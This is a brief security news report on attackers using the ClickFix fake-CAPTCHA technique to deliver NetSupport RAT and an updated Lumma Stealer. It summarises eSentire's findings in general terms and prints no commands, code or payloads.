Threat actors have been observed utilizing the increasingly prevalent ClickFix technique to distribute a remote access trojan known as NetSupport RAT, starting from early January 2025.
NetSupport RAT, which is typically spread through fake websites and bogus browser updates, grants attackers complete control over the compromised host, allowing them to monitor the device’s screen in real-time, control the keyboard and mouse, upload and download files, and execute malicious commands.
Originally developed as a legitimate remote IT support program called NetSupport Manager, it has since been repurposed by malicious actors to target organizations and capture sensitive information, including screenshots, audio, video, and files.
“The ClickFix technique involves injecting a fake CAPTCHA webpage on compromised websites, instructing users to follow certain steps to copy and execute malicious PowerShell commands on their host to download and run malware payloads,” according to an analysis by eSentire reported.
In the identified attack chains, the PowerShell command is used to download and execute the NetSupport RAT client from a remote server hosting malicious components in the form of PNG image files.
Notably, the ClickFix approach is also being utilized to spread an updated version of the Lumma Stealer malware, which employs the ChaCha20 cipher for decrypting a configuration file containing the list of command-and-control (C2) servers.
eSentire noted that “these changes provide insight into the evasive tactics employed by the developer(s) who are actively working to circumvent current extraction and analysis tools.”
